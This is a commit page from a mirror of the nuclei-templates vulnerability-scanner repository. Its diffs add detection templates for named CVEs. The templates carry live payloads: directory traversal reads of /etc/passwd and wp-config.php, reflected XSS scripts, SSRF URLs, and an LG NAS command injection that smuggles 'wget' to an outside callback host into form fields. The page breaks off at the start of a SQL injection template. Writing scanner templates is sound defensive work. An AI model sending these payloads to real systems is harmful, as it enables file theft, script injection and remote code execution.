daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #79 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-08-05 15:24:35 +05:30 committed by GitHub
parent 07f2647e1f 105a093c91
commit 22aa5c67ee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
108 changed files with 3817 additions and 1390 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.github/workflows/templates-stats.yml vendored
View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Checkout Repo
uses: actions/checkout@master

1
CONTRIBUTING.md
View File

@ -97,3 +97,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
**138 directories, 1709 files**.
**139 directories, 1792 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1291
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |

27
cves/2010/CVE-2010-4617.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4617
info:
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

33
cves/2011/CVE-2011-4336.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2011-4336
info:
name: Tiki Wiki CMS Groupware 7.0 has XSS
author: pikpikcu
severity: medium
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- https://www.securityfocus.com/bid/48806/info
- https://seclists.org/bugtraq/2011/Nov/140
tags: cve,cve2011,xss,tikiwiki
requests:
- method: GET
path:
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

27
cves/2012/CVE-2012-0991.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0991
info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-4253.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-4253
info:
name: MySQLDumper 1.24.4 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: |
- https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
cves/2014/CVE-2014-4535.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4536.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-8799.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-8799
info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: |
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_USER"
- "DB_HOST"
part: body
condition: and
- type: status
status:
- 200

2
cves/2015/CVE-2015-2080.yaml
View File

@ -15,7 +15,7 @@ info:
requests:
- method: POST
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
headers:
Referer: \x00

31
cves/2015/CVE-2015-2807.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-2807
info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2015/CVE-2015-9414.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-9414
info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

5
cves/2016/CVE-2016-1000128.yaml
View File

@ -4,7 +4,10 @@ info:
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
reference: |
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:

31
cves/2016/CVE-2016-1000148.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-1000148
info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script><"'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000149.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000149
info:
name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000153.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000153
info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000155.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000155
info:
name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2016/CVE-2016-10993.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-10993
info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

5
cves/2017/CVE-2017-5487.yaml
View File

@ -33,3 +33,8 @@ requests:
- '"name":'
- '"avatar_urls":'
condition: and
extractors:
- type: regex
part: body
regex:
- '"name":"[^"]*"'

31
cves/2018/CVE-2018-10095.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-10095
info:
name: Dolibarr before 7.0.2 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
tags: cve,cve2018,xss,dolibarr
requests:
- method: GET
path:
- "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

42
cves/2018/CVE-2018-10818.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-201810818
info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
reference: |
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oob
requests:
- raw:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

30
cves/2018/CVE-2018-14013.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-14013
info:
name: Zimbra XSS
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
tags: cve,cve2018,xss,zimbra
requests:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

21
cves/2018/CVE-2018-15517.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2018-15517
info:
name: D-LINK Central WifiManager - SSRF
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
author: gy741
severity: medium
tags: cve,cve2018,dlink,ssrf,oob
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

27
cves/2018/CVE-2018-15745.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-15745
info:
name: Argus Surveillance DVR - Directory Traversal
author: gy741
severity: high
description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
tags: cve,cve2018,argussurveillance,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "for 16-bit app support"
- "[drivers]"
condition: and

27
cves/2018/CVE-2018-19458.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-19458
info:
name: PHP Proxy 3.0.3 - Local File Inclusion
author: daffainfo
severity: high
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
reference: |
- https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2018/CVE-2018-20470.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2018-20470
info:
name: Sahi pro 7.x/8.x - Directory Traversal
author: daffainfo
severity: high
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
reference: |
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

2
cves/2018/CVE-2018-3810.yaml
View File

@ -18,7 +18,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

31
cves/2018/CVE-2018-5233.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-5233
info:
name: Grav CMS before 1.3.0 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233
tags: cve,cve2018,xss,grav
requests:
- method: GET
path:
- "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

2
cves/2019/CVE-2019-0221.yaml
View File

@ -7,6 +7,7 @@ info:
reference: |
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
@ -18,6 +19,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and
matchers:

29
cves/2019/CVE-2019-12276.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2019-12276
info:
name: GrandNode 4.40 - Path Traversal
author: daffainfo
severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: |
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
headers:
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

4
cves/2019/CVE-2019-16332.yaml
View File

@ -5,7 +5,9 @@ info:
author: daffainfo
severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
reference: |
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:

2
cves/2019/CVE-2019-3401.yaml
View File

@ -3,8 +3,10 @@ id: CVE-2019-3401
info:
name: Atlassian JIRA Information Exposure (CVE-2019-3401)
author: TechbrunchFR,milo2012
description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
severity: info
tags: cve,cve2019,jira,atlassian
reference: https://jira.atlassian.com/browse/JRASERVER-69244
requests:
- method: GET

18
cves/2019/CVE-2019-8451.yaml
View File

@ -8,17 +8,23 @@ info:
reference: |
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
tags: cve,cve2019,atlassian,jira,ssrf
- https://hackerone.com/reports/713900
tags: cve,cve2019,atlassian,jira,ssrf,oob
requests:
- method: GET
- method: POST
path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
body: |
url=https://{{Hostname}}:443@{{interactsh-url}}
headers:
X-Atlassian-token: no-check
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
name: ssrf-response-body
part: interactsh_protocol
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body
- "http" # Confirms the HTTP Interaction

4
cves/2020/CVE-2020-13927.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2020-13927
info:
name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
severity: critical
tags: cve,cve2020,apache,airflow,unauth
requests:
@ -17,4 +17,4 @@ requests:
- '"dag_run_url":'
- '"dag_id":'
- '"items":'
condition: and
condition: and

26
cves/2020/CVE-2020-27361.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-27361
info:
name: Akkadian Provisioning Manager - Files Listing
author: gy741
severity: high
description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
tags: cve,cve2020,akkadian,listing,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/pme/media/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /pme/media"
- "Parent Directory"
condition: and
- type: status
status:
- 200

8
cves/2020/CVE-2020-35489.yaml
View File

@ -26,5 +26,11 @@ requests:
- type: regex
regex:
- '^= ([0-4]\.[0-9\.]+|5\.[0-2]|5\.[0-2]\.[0-9]+|5\.3\.[0-1]) ='
- '^== Changelog =="'
part: body
- type: regex
regex:
- '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) ='
negative: true
part: body

27
cves/2020/CVE-2020-35598.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2020-35598
info:
name: Advanced Comment System 1.0 - Path Traversal
author: daffainfo
severity: high
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference: |
- https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

40
cves/2020/CVE-2020-6637.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2020-6637
info:
name: OpenSIS v7.3 unauthenticated SQL injection
author: pikpikcu
severity: high
